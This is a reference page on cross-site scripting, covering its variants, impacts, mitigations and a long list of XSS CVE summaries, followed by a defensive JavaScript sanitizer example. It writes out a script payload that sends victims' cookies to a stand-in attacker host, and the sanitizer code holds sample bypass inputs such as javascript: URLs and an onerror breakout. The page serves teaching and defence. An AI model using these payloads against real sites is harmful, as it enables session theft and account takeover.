Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
The application takes untrusted data (a query parameter, a form field, a record it stored earlier) and places it into an HTML response without validating it or encoding it for the context in which it lands. The attacker crafts input containing HTML or JavaScript, and the application incorporates it into its response as if it were part of the page. When a victim's browser renders that response, it executes the injected script with the origin and privileges of the trusted site.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response; it is typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side: JavaScript already running in the page reads attacker-controllable data from a source such as location.hash or document.referrer and passes it to a sink such as innerHTML or eval(), so the payload can reach the victim without ever being sent to the server.
A typical attack flow starts with the attacker identifying an injection point, anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker access to any cookie not marked HttpOnly, tokens kept in Web Storage, the page's DOM, and the ability to send requests that carry the victim's session.
Impact
- Session hijacking: Steal authentication cookies that lack the HttpOnly flag (or tokens kept in Web Storage) to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways suffered a supply chain compromise (2018) in which attackers modified a JavaScript library served from the airline's own site, adding code that skimmed payment card details from around 380,000 transactions. Strictly this was a compromise of first-party script rather than XSS through untrusted input, but the effect is the same one XSS produces: hostile JavaScript running in the trusted origin, which is why the same controls (a strict CSP, subresource integrity, minimal script on payment pages) apply.
Mitigation
- Context-aware output encoding: HTML-encode for HTML body and attribute values (and always quote the attributes), JavaScript-encode for JS string literals, URL-encode for query parameters, and allow-list the scheme for href/src values; a single generic escape routine cannot be right for every context
- Content Security Policy (CSP): Deploy a strict CSP (a nonce- or hash-based script-src with 'strict-dynamic' and object-src 'none') so that only scripts the server explicitly marks can run; host allow-lists alone are routinely bypassed through JSONP endpoints or other scripts on the permitted hosts
- HttpOnly and Secure cookie flags: HttpOnly keeps session cookies out of document.cookie and Secure restricts them to HTTPS. This limits cookie theft, not the attack itself: injected script can still issue requests that carry the cookie automatically
- Input validation: Reject unexpected characters and patterns at the boundary, but treat this as defense in depth rather than the primary control, since validation at input time cannot know the output context
- DOM-based XSS prevention: Use safe APIs like textContent instead of innerHTML; avoid passing user data to dangerous sinks like eval(), document.write() and location assignments, and check the scheme before assigning a user-supplied value to href or src
Recent CVEs (9950)
Aspera Faspex versions up to 5.0.14.3 contain a vulnerability that allows attackers to conduct various attacks against the vulnerable system, including cross-site scripting (CVSS 5.4).
IBM Aspera Faspex 5 5.0.0 through 5.0.14.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. [CVSS 5.4 MEDIUM]
Cross-site Scripting (XSS) allows an attacker to submit specially crafted data to the application which is returned unaltered in the resulting web page.
Stored XSS in NextScripts Social Networks Auto-Poster plugin for WordPress (versions up to 4.4.6) allows authenticated Contributor-level users to inject malicious scripts through the `[nxs_fbembed]` shortcode due to insufficient input sanitization. Attackers can embed arbitrary JavaScript that executes when other users access the affected pages. A patch is not currently available.
RenderBlocking is a MediaWiki extension that allows interface administrators to specify render-blocking CSS and JavaScript. Versions up to 0.1.1 are affected by cross-site scripting (XSS).
Copyparty versions before 1.20.11 fail to apply the nohtml security restriction to SVG files, allowing authenticated users with write permissions to upload SVG images containing malicious JavaScript that executes when opened by other users. This cross-site scripting vulnerability bypasses the intended protection against JavaScript execution in user-uploaded content. The vulnerability has been patched in version 1.20.11.
Stored cross-site scripting in FileBrowser versions prior to 1.3.1-beta and 1.2.2-stable allows authenticated attackers to inject malicious scripts through share metadata fields that are rendered without HTML escaping. When victims visit affected share URLs, the injected scripts execute in their browsers with the victim's privileges, potentially leading to session hijacking, credential theft, or further compromise. A patch is available in the fixed versions; the currently reported exploitation likelihood is 0%.
Unlimited Elements for Elementor (WordPress plugin) is affected by cross-site scripting (XSS) (CVSS 7.2).
Information disclosure in Microsoft 365 Apps Excel allows unauthenticated remote attackers to extract sensitive data through stored cross-site scripting attacks in generated web content. The vulnerability requires no user interaction and affects all Excel users who process untrusted documents. No patch is currently available, leaving users dependent on mitigation strategies until Microsoft releases a fix.
Microsoft SharePoint Server contains a reflected cross-site scripting vulnerability that allows remote attackers to execute arbitrary scripts in users' browsers through malicious links, enabling spoofing attacks and credential theft. The vulnerability requires user interaction to trigger and affects all SharePoint deployments with no available patch. With a CVSS score of 8.1, this poses a significant risk to organizations relying on SharePoint for collaboration.
FortiSIEM 7.3.0-7.3.4 and 7.4.0 are vulnerable to reflected cross-site scripting that allows unauthenticated remote attackers to inject malicious scripts through URL parameters, enabling social engineering attacks against users who click malicious links. The vulnerability requires user interaction to trigger but has no authentication requirements, making it practical for phishing campaigns that redirect victims to spoofed pages.
Stored XSS in the Quiz feature of the MetForm Pro WordPress plugin, versions up to 3.9.6, allows unauthenticated attackers to inject malicious scripts through insufficient input sanitization. When users access affected pages, the injected scripts execute in their browsers, potentially compromising session data or performing unauthorized actions. No patch is currently available.
An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in benkeen generatedata 4.0.14. [CVSS 6.1 MEDIUM]
An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, and FortiSandbox 4.0 all versions may allow an authenticated privileged attacker to execute code via crafted requests. [CVSS 4.8 MEDIUM]
Siemens devices have a stored XSS in trace file handling (CVSS 9.6) enabling code execution when administrators view diagnostic data.
A CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists that could allow authenticated attackers to have a victim's browser run arbitrary JavaScript when the victim hovers over a maliciously crafted element on a web server containing the injected payload.
facileManager is a modular suite of web apps built with the sysadmin in mind. Versions up to 6.0.4 are affected by cross-site scripting (XSS) (CVSS 7.6).
FacileManager versions prior to 6.0.4 contain a reflected cross-site scripting vulnerability in the fmDNS module's log_search_query parameter that allows authenticated attackers to inject malicious JavaScript through crafted URLs. An attacker with login credentials can exploit this to execute arbitrary scripts in users' browsers, potentially compromising sensitive administrative data or session tokens. No patch is currently available for affected deployments.
Bucket is a MediaWiki extension to store and retrieve structured data on articles. Versions up to 2.1.1 are affected by cross-site scripting (XSS).
Flarum's nicknames extension allows authenticated users to inject email-like hyperlinks into their nicknames, which are rendered verbatim in plain-text notification emails sent to other users. An attacker can exploit this to craft malicious nicknames that email clients interpret as clickable links, potentially redirecting recipients to attacker-controlled domains for phishing or credential harvesting. No patch is currently available for this vulnerability.
Appsmith platform prior to version 1.96 has a critical stored XSS enabling account takeover through crafted admin panel content.
DOM-based XSS in SAP Business One Job Service allows unauthenticated attackers to inject malicious code through unvalidated URL query parameters, compromising user sessions when victims interact with crafted links. Successful exploitation could leak sensitive data or modify application content, though availability is not affected. No patch is currently available.
Affected product(s)/version(s): InfoSphere Data Architect 9.2.1 [CVSS 6.1 MEDIUM]
An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in linagora Twake v2023.Q1.1223. This allows attackers to execute arbitrary code. [CVSS 8.8 HIGH]
An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in Sunbird-Ed SunbirdEd-portal v1.13.4. [CVSS 5.4 MEDIUM]
An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in YMFE yapi v1.12.0. [CVSS 5.4 MEDIUM]
A vulnerability has been found in SourceCodester Resort Reservation System 1.0. The affected element is an unknown function of the file /?page=manage_reservation of the component Reservation Management Module. [CVSS 3.5 LOW]
A reflected Cross-Site Scripting (XSS) vulnerability has been found in Eventobot. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending the victim a malicious URL that uses the 'name' parameter of '/search-results'. [CVSS 6.1 MEDIUM]
Stored cross-site scripting in itsourcecode Payroll Management System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the ID parameter in /manage_employee_allowances.php. Public exploit code exists for this vulnerability, though no patch is currently available. Successful exploitation could enable credential theft or unauthorized actions within the payroll system.
Web-Based Pharmacy Product Management System versions up to 1.0 are affected by cross-site scripting (XSS) (CVSS 3.5).
Simple Flight Ticket Booking System versions up to 1.0 are affected by cross-site scripting (XSS) (CVSS 4.3).
A flaw has been found in YiFang CMS 2.0.5. This affects the function update of the file app/db/admin/D_singlePageGroup.php. [CVSS 3.5 LOW]
A vulnerability was detected in YiFang CMS 2.0.5. The impacted element is the function update of the file app/db/admin/D_singlePage.php. [CVSS 3.5 LOW]
A security vulnerability has been detected in YiFang CMS 2.0.5. The affected element is the function update of the file app/db/admin/D_friendLink.php. [CVSS 3.5 LOW]
A weakness has been identified in 1024-lab/lab1024 SmartAdmin versions up to 3.29, which are affected by cross-site scripting (XSS) (CVSS 3.5).
A security flaw has been discovered in 1024-lab/lab1024 SmartAdmin up to 3.29. Impacted is an unknown function of the file smart-admin-web-javascript/src/views/business/oa/notice/components/notice-form-drawer.vue of the component Notice Module. The manipulation results in cross site scripting. The attack can be launched remotely. The exploit has been released to the public and may be used for a...
A vulnerability was determined in Wavlink WL-WN579X3-C 231124. This vulnerability affects the function sub_401AD4 of the file /cgi-bin/adm.cgi. [CVSS 2.4 LOW]
Reflected cross-site scripting (XSS) in SourceCodester Loan Management System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the page parameter in /index.php. Public exploit code exists for this vulnerability, increasing the risk of active exploitation. The vulnerability enables attackers to perform actions on behalf of victims or steal sensitive information, though no patch is currently available.
The DisallowedRawHtml extension in PHP Commonmark (league/commonmark) versions prior to 2.8.1 can be bypassed by injecting whitespace characters between HTML tag names and closing brackets, allowing malicious scripts to pass sanitization filters and execute in user browsers. Applications relying solely on this extension to sanitize untrusted markdown input are vulnerable to cross-site scripting attacks, though those using additional HTML sanitizers are unaffected. No patch is currently available for affected versions.
Account takeover in Zitadel versions 4.0.0 through 4.11.1 is possible through improper redirect URI validation in the login V2 interface, allowing attackers with high privileges to compromise user accounts. This cross-site scripting vulnerability affects organizations using the vulnerable Zitadel identity management platform and has been resolved in version 4.12.0.
Stored XSS in ZITADEL identity management platform versions 4.0.0 to 4.11.1 allows unauthenticated attackers to inject persistent scripts through the login flow. Patch available.
DOM-based XSS in the RSS Aggregator plugin for WordPress (versions up to 5.0.11) allows unauthenticated attackers to execute arbitrary JavaScript in an administrator's browser session by exploiting missing origin validation in postMessage handlers. An attacker can craft a malicious website that tricks an admin into visiting it, sending crafted payloads that bypass the plugin's unsafe URL handling in admin-shell.js. This affects all WordPress installations running the vulnerable plugin versions without authentication requirements.
Stored XSS in LotekMedia Popup Form plugin for WordPress through version 1.0.6 allows administrators to inject malicious scripts into popup settings due to improper input sanitization. When site visitors view pages containing the affected popup, the injected scripts execute in their browsers, potentially compromising user sessions or stealing sensitive data. A patch is not currently available.
Stored XSS in the Show YouTube video WordPress plugin through improper sanitization of the 'syv' shortcode attributes allows authenticated users with contributor-level permissions to inject malicious scripts into pages. When other users view affected pages, the injected scripts execute in their browsers, potentially compromising sessions or stealing sensitive data. No patch is currently available for versions up to 1.1.
Infomaniak Connect for OpenID (WordPress plugin) is affected by cross-site scripting (XSS) (CVSS 6.4).
Stored XSS in the WordPress Consensus Embed plugin through version 1.6 allows authenticated contributors and above to inject malicious scripts into pages via insufficiently sanitized shortcode attributes. When users visit affected pages, the injected scripts execute in their browsers, potentially compromising session data or performing unauthorized actions. No patch is currently available for this vulnerability.
Media Library Alt Text Editor (WordPress plugin) is affected by cross-site scripting (XSS) (CVSS 6.4).
The DA Media GigList WordPress plugin up to version 1.9.0 contains stored cross-site scripting (XSS) in its shortcode functionality due to improper input validation, allowing authenticated contributors and above to inject malicious scripts that execute for all users viewing affected pages. This vulnerability requires valid WordPress account credentials but no user interaction to exploit, enabling persistent code injection across the site.
The MyQtip WordPress plugin through version 2.0.5 contains a stored cross-site scripting vulnerability in its shortcode handler that fails to properly sanitize user-supplied attributes. Authenticated users with contributor-level permissions or higher can inject malicious scripts that execute in the browsers of visitors viewing affected pages. No patch is currently available for this vulnerability.
Stored cross-site scripting in the WordPress Wueen plugin through version 0.2.0 allows authenticated users with contributor-level permissions to inject malicious scripts via the wueen-blocket shortcode due to inadequate input validation. Injected scripts execute in the browsers of any user viewing affected pages, potentially enabling session hijacking, credential theft, or defacement. No patch is currently available.
Unauthenticated attackers can inject malicious scripts into WordPress sites running the WP App Bar plugin (versions up to 1.5) through the 'app-bar-features' parameter due to missing input validation and authorization checks. When site administrators access the plugin's settings page, the stored payload executes in their browser, enabling credential theft or unauthorized actions. No patch is currently available for this vulnerability.
Stored XSS in the Carta Online WordPress plugin through version 2.13.0 allows authenticated administrators to inject malicious scripts into admin settings that execute for other users accessing affected pages. The vulnerability requires administrator privileges and only impacts WordPress multisite installations or those with unfiltered_html disabled. No patch is currently available.
Reflected cross-site scripting (XSS) in Wallos password reset functionality before version 4.6.2 allows unauthenticated attackers to inject malicious scripts by manipulating token and email parameters that are output without sanitization. Public exploit code exists for this vulnerability, affecting self-hosted instances of Wallos. A patch is available in version 4.6.2 and later.
Defuddle versions prior to 0.9.0 fail to properly escape image attributes in HTML processing, allowing attackers to inject malicious event handlers through specially crafted alt text containing quote characters. Public exploit code exists for this cross-site scripting vulnerability. The vulnerability affects all users of Defuddle before version 0.9.0, and a patch is available.
Stored XSS in WordPress Stock Ticker plugin through version 3.26.1 allows authenticated administrators to inject malicious scripts into admin settings that execute for other users viewing affected pages. The vulnerability requires administrator privileges and only impacts multi-site WordPress installations or those with unfiltered_html disabled. No patch is currently available.
Stored XSS in MailArchiver plugin for WordPress versions up to 4.4.0 allows authenticated administrators to inject malicious scripts through insufficiently sanitized admin settings, affecting multi-site installations and those with disabled unfiltered_html. Attackers with admin privileges can execute arbitrary JavaScript that persists and triggers when other users access affected pages. No patch is currently available.
Reflected XSS in CM Custom Reports plugin for WordPress (versions up to 1.2.7) allows unauthenticated attackers to inject malicious scripts through inadequately sanitized 'date_from' and 'date_to' parameters. An attacker can exploit this by tricking users into clicking malicious links, causing arbitrary scripts to execute in their browsers with access to sensitive data or session information. No patch is currently available.
Stored XSS in the Hammas Calendar WordPress plugin through version 1.5.11 allows authenticated contributors and above to inject malicious scripts via the 'apix' parameter in the 'hp-calendar-manage-redirect' shortcode due to inadequate input sanitization. When users access pages containing the injected payload, the scripts execute in their browsers, potentially leading to session hijacking, credential theft, or malware distribution. No patch is currently available.
Stored cross-site scripting in Zikestor SKS8310-8X firmware versions 1.04.B07 and earlier allows authenticated users to inject malicious scripts via the System Name field, which execute when other administrators view the configuration. The lack of proper output encoding enables attackers with login credentials to compromise the security of administrative sessions viewing the affected switch settings.
Reflected cross-site scripting in GroupOffice versions before 6.8.155, 25.0.88, and 26.0.10 allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious code through the Base64-encoded f parameter. The vulnerability exists in the external/index flow where user input is decoded and inserted into inline JavaScript without proper sanitization. Public exploit code exists for this vulnerability.
Reflected cross-site scripting in GroupOffice installer versions prior to 6.8.155, 25.0.88, and 26.0.10 allows unauthenticated attackers to inject arbitrary scripts through the license parameter in install/license.php. Public exploit code exists for this vulnerability, enabling attackers to execute malicious JavaScript in users' browsers with moderate impact to confidentiality and integrity. The vulnerability requires user interaction and affects the web-accessible installation endpoint.
HTML meta tags with http-equiv="refresh" attributes fail to properly escape URLs inserted through certain actions, enabling cross-site scripting (XSS) attacks against applications using this functionality. An unauthenticated attacker can exploit this to execute arbitrary JavaScript in users' browsers by crafting malicious URLs. No patch is currently available, though a GODEBUG setting (htmlmetacontenturlescape=0) can be configured as a temporary mitigation.
Kestra versions 1.1.10 and earlier allow authenticated users to perform cross-site scripting (XSS) attacks through the execution-file preview feature, which renders unsanitized Markdown as HTML. An attacker with login credentials can inject malicious scripts that execute in other users' browsers, potentially leading to session hijacking or credential theft. Public exploit code exists and no patch is currently available.
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Pascal Birchler Preferred Languages allows DOM-Based XSS. This issue affects Preferred Languages: from n/a through 2.2.2. [CVSS 5.9 MEDIUM]
Reflected cross-site scripting in WP All Import plugin versions up to 4.0.0 allows unauthenticated attackers to inject malicious scripts through the 'filepath' parameter due to improper input validation and output encoding. Successful exploitation requires tricking users into clicking a specially crafted link, after which arbitrary JavaScript executes in their browser session. A patch is not currently available.
Reflected XSS in SiYuan knowledge management before 3.5.9.
Cross-site scripting in HumHub 1.18.0's Button component allows unauthenticated attackers to inject and execute malicious scripts in users' browsers through inconsistent output encoding. Affected users could have their sessions compromised or be redirected to malicious content without any user interaction beyond visiting a crafted page. A patch is available in version 1.18.1.
Reflected XSS in changedetection.io versions prior to 0.54.4 allows unauthenticated remote attackers to inject malicious JavaScript through the /rss/tag/ endpoint via an unescaped tag_uuid parameter, enabling session hijacking or credential theft when victims visit crafted links. The vulnerability requires user interaction to trigger and affects the Flask-based application with public exploit code available. Users should upgrade to version 0.54.4 or later immediately.
OneUptime versions 10.0.11 and earlier contain an improper WebAuthn implementation where server-side challenge validation is missing, allowing attackers with a captured assertion to replay valid authentication tokens indefinitely and bypass multi-factor authentication. The vulnerability affects authenticated users and requires only low privileges to exploit, with public exploit code already available. No patches are currently available for this high-severity flaw.
Stored XSS in Gokapi through malicious SVG file uploads enables authenticated attackers to execute arbitrary JavaScript in users' browsers via hotlinked files. An attacker with valid credentials can craft SVG payloads that persist in the application and compromise other users accessing the shared links. No patch is currently available for versions prior to 2.2.3.
LangBot is a global IM bot platform designed for LLMs. Versions up to 4.8.7 are affected by cross-site scripting (XSS) (CVSS 6.3).
Chartbrew versions prior to 4.8.4 allow authenticated users to upload arbitrary files by bypassing file type validation, enabling stored XSS attacks through malicious HTML files served from the uploads directory. An attacker can exploit this to steal authentication tokens stored in localStorage and achieve account takeover. Public exploit code exists for this vulnerability, and no patch is currently available.
Second stored XSS in Chamilo LMS before 1.11.34.
Stored XSS in Chamilo LMS before 1.11.34.
Chamilo is a learning management system. Prior to version 1.11.34, a stored XSS vulnerability exists in Chamilo LMS that allows a staff account to execute arbitrary JavaScript in the browser of higher-privileged admin users. [CVSS 5.4 MEDIUM]
Chamilo is a learning management system. Prior to version 1.11.34, a stored XSS vulnerability in Chamilo LMS (version 1.11.32) allows an attacker to inject arbitrary JavaScript into the platform's social network and internal messaging features. [CVSS 8.8 HIGH]
Reflected cross-site scripting in HSC Cybersecurity Mailinspector through version 5.3.2-3 allows remote attackers to inject malicious scripts via the error_description parameter in the URL handler component. Public exploit code exists for this vulnerability, which could enable attackers to steal session cookies or perform actions on behalf of authenticated users. Users should upgrade to version 5.4.0 or apply the available hotfix immediately.
Stored Cross-Site Scripting in the Greenshift page builder plugin for WordPress (versions up to 12.8.5) allows authenticated users with Contributor privileges or higher to inject malicious scripts through the `_gspb_post_css` post meta and `dynamicAttributes` block attributes due to inadequate input sanitization. When other users access affected pages, the injected scripts execute in their browsers, potentially compromising their sessions or stealing sensitive data. No patch is currently available.
Stored cross-site scripting in Frappe versions prior to 16.11.0 and 15.102.0 allows unauthenticated attackers to execute arbitrary JavaScript in users' browsers through malicious image URLs in avatar fields and website comments. The vulnerability affects any user viewing a page containing the compromised avatar, enabling session hijacking, credential theft, or malware distribution without user interaction.
MarkUs prior to version 2.9.1 fails to sanitize user-submitted file contents in the HTML rendering endpoint, allowing authenticated users to inject malicious scripts that execute in other users' browsers once the victim opens the rendered file. An attacker can exploit this reflected cross-site scripting vulnerability to steal session tokens, modify grades, or perform actions on behalf of affected students and instructors. The vulnerability has been patched in version 2.9.1.
Stored XSS in Chamilo LMS before 1.11.34 via file uploads in Social Networks. Leads to account takeover.
lxml_html_clean versions prior to 0.4.4 fail to sanitize <base> HTML tags, allowing attackers to inject malicious base tags and redirect relative links to attacker-controlled domains. Public exploit code exists for this vulnerability. The issue affects applications using the default Cleaner configuration and has been remediated in version 0.4.4.
lxml_html_clean versions before 0.4.4 fail to properly sanitize CSS Unicode escape sequences in the _has_sneaky_javascript() method, allowing attackers to bypass filters and inject malicious @import statements or XSS payloads. Public exploit code exists for this vulnerability, which affects applications using the library for HTML sanitization. A patch is available in version 0.4.4 and should be applied immediately to prevent CSS-based injection attacks.
CKEditor 5 versions before 47.6.0 contain a stored XSS vulnerability in the General HTML Support feature that allows attackers to execute arbitrary JavaScript by injecting malicious markup into documents processed by vulnerable editor instances. This vulnerability affects users relying on unsafe General HTML Support configurations, potentially enabling session hijacking, credential theft, or malware distribution. No patch is currently available for affected deployments.
Stored XSS in Wagtail's simple_translation module allows authenticated admin users to inject malicious JavaScript through specially-crafted page titles that executes when other admins perform translation actions, potentially compromising their credentials. The vulnerability affects Wagtail versions prior to 6.3.8, 7.0.6, 7.2.3, and 7.3.1, and requires admin-level access to exploit, limiting exposure to internal threats. Patches are available for all affected versions.
Stored XSS in Wagtail's TableBlock allows authenticated users with page editing permissions to inject malicious class attributes that execute arbitrary JavaScript when pages are viewed by other users. An attacker could exploit this to perform administrative actions or steal credentials from higher-privileged users viewing the compromised content. The vulnerability affects Wagtail versions prior to 6.3.8, 7.0.6, 7.2.3, and 7.3.1, with patches now available.
Gogs versions prior to 0.14.2 contain a DOM-based XSS vulnerability in the Issue creation page where attackers can inject malicious scripts through milestone names that execute when other users interact with those milestones. An authenticated attacker can craft a repository with a malicious milestone name containing JavaScript payloads that trigger in victim browsers, potentially compromising user sessions or sensitive data. No patch is currently available for affected versions.
Stored cross-site scripting in Gogs prior to version 0.14.2 allows unauthenticated attackers to inject malicious scripts through template rendering of user-controlled data, potentially affecting all users viewing compromised content. The vulnerability exploits unsafe handling of data URLs combined with permissive sanitization, enabling attackers to steal session cookies, deface pages, or perform actions on behalf of victims. A patch is available in version 0.14.2 and later.
Stored XSS in Gogs prior to version 0.14.2 allows authenticated users to execute arbitrary JavaScript in comments and issue descriptions by exploiting the HTML sanitizer's allowance of data: URI schemes. This affects all users viewing malicious content within the same Gogs instance and could enable session hijacking or credential theft. Public exploit code exists for this vulnerability, though a patch is available in version 0.14.2 and later.
Koha versions 25.11 and earlier contain a stored cross-site scripting vulnerability in the News function that allows authenticated users to inject malicious scripts affecting other users who view the compromised content. Public exploit code exists for this vulnerability, and attackers can leverage it to steal session data or perform actions on behalf of victims. A patch is not currently available for affected deployments.
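Several entries above describe the same sanitizer failure classes: a tag spelled with extra whitespace slipping past an exact-match filter, an injected <base> element, data: and javascript: URLs surviving an attribute filter, and attribute values that break out of their quotes. The following added example, written for this page and not the code of any product in the list, contrasts a naive blocklist with an allow-list rebuild on constructed inputs. The tag and attribute sets, the function names and the example.invalid base origin are assumptions; a real deployment should use a maintained sanitizer, and this toy only shows why the allow-list shape matters.

```javascript
// Added example, not the code of any product in the list above: a naive blocklist
// sanitizer next to an allow-list rebuild, run on constructed inputs that exercise
// the bypass classes the entries describe. Tag/attribute sets and the
// example.invalid base origin are assumptions made for this illustration.

// Constructed samples, one per failure class.
const SAMPLES = {
  spacedTag: "<script >alert(1)</script >",
  baseTag: '<base href="https://evil.example/"><a href="/login">Login</a>',
  dataUrl: '<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>',
  jsUrl: '<a href="javascript:alert(1)">click</a>',
  altBreakout: 'x" onerror="alert(1)',
};

// Naive: remove dangerous tags by exact spelling and keep everything else.
function naiveSanitize(html) {
  return html
    .replace(/<script>[\s\S]*?<\/script>/gi, "")
    .replace(/<\/?(iframe|object|embed)>/gi, "");
}

// Allow-list: tokenize, keep only known tags and attributes, re-encode on output.
const ALLOWED = {
  a: ["href", "title"], img: ["src", "alt"],
  b: [], i: [], p: [], br: [], ul: [], ol: [], li: [], code: [], pre: [],
};
const VOID_TAGS = new Set(["img", "br"]);
// Own-property check: a plain "in" would accept "<constructor>" via the prototype.
const isAllowedTag = (name) => Object.prototype.hasOwnProperty.call(ALLOWED, name);

function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// URL attributes: only http(s) survive, so data: and javascript: are dropped.
function safeUrl(value) {
  try {
    const u = new URL(value, "https://example.invalid/"); // the site's origin in practice
    return u.protocol === "https:" || u.protocol === "http:" ? u.href : null;
  } catch (e) {
    return null;
  }
}

const TOKEN = /<!--[\s\S]*?-->|<[^>]*>|[^<]+|</g;
const TAG = /^<(\/?)\s*([a-zA-Z][a-zA-Z0-9-]*)([\s\S]*?)\/?>$/;
const ATTR = /([a-zA-Z][\w:-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function allowListSanitize(html) {
  const out = [];
  for (const tok of html.match(TOKEN) || []) {
    if (tok.startsWith("<!--")) continue;                  // comments dropped
    const m = tok.startsWith("<") ? TAG.exec(tok) : null;
    if (!m) { out.push(htmlEncode(tok)); continue; }      // text, or a stray "<"
    const [, close, rawName, attrText] = m;
    const name = rawName.toLowerCase();                   // "<script >" parses as script
    if (!isAllowedTag(name)) continue;                    // script, base, iframe... gone
    if (close) { if (!VOID_TAGS.has(name)) out.push(`</${name}>`); continue; }
    const attrs = [];
    ATTR.lastIndex = 0;
    let a;
    while ((a = ATTR.exec(attrText)) !== null) {
      const key = a[1].toLowerCase();
      let val = a[2] ?? a[3] ?? a[4] ?? "";
      if (!ALLOWED[name].includes(key)) continue;         // on*, style, etc. dropped
      if (key === "href" || key === "src") {
        val = safeUrl(val);
        if (val === null) continue;
      }
      attrs.push(` ${key}="${htmlEncode(val)}"`);
    }
    out.push(`<${name}${attrs.join("")}>`);
  }
  return out.join("");
}

// Attribute breakout is a templating fault, not a sanitizer one: the alt text is
// inserted verbatim, and a quote inside it starts a new attribute.
function buildImgNaive(alt) { return `<img src="x.png" alt="${alt}">`; }
function buildImgSafe(alt)  { return `<img src="x.png" alt="${htmlEncode(alt)}">`; }

function demo() {
  const naiveImg = buildImgNaive(SAMPLES.altBreakout);
  return {
    naiveKeepsSpacedScript: naiveSanitize(SAMPLES.spacedTag).includes("<script"),
    allowListDropsSpacedScript: !allowListSanitize(SAMPLES.spacedTag).includes("<"),
    naiveKeepsBase: naiveSanitize(SAMPLES.baseTag).includes("<base"),
    allowListDropsBase: !allowListSanitize(SAMPLES.baseTag).includes("<base"),
    allowListKeepsLink: allowListSanitize(SAMPLES.baseTag).includes("<a href="),
    naiveKeepsDataUrl: naiveSanitize(SAMPLES.dataUrl).includes("data:"),
    allowListDropsDataUrl: !allowListSanitize(SAMPLES.dataUrl).includes("data:"),
    allowListDropsJsUrl: !allowListSanitize(SAMPLES.jsUrl).includes("javascript:"),
    naiveImgHasHandler: / onerror=/.test(naiveImg),
    sanitizedImgHasHandler: / onerror=/.test(allowListSanitize(naiveImg)),
    safeImgQuoteCount: (buildImgSafe(SAMPLES.altBreakout).match(/"/g) || []).length,
  };
}

console.log(demo());
```

The important property is that the allow-list version never copies input markup through: every tag and attribute in its output is rebuilt from a parsed name and a re-encoded value, so spelling variants, unknown elements and non-http URL schemes cannot survive by being unanticipated. Text is re-encoded on output as well, which is safe but double-encodes entities already present in the input; a production sanitizer decodes first.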
Quick Facts
- Typical severity: MEDIUM
- Category: web
- Total CVEs: 9950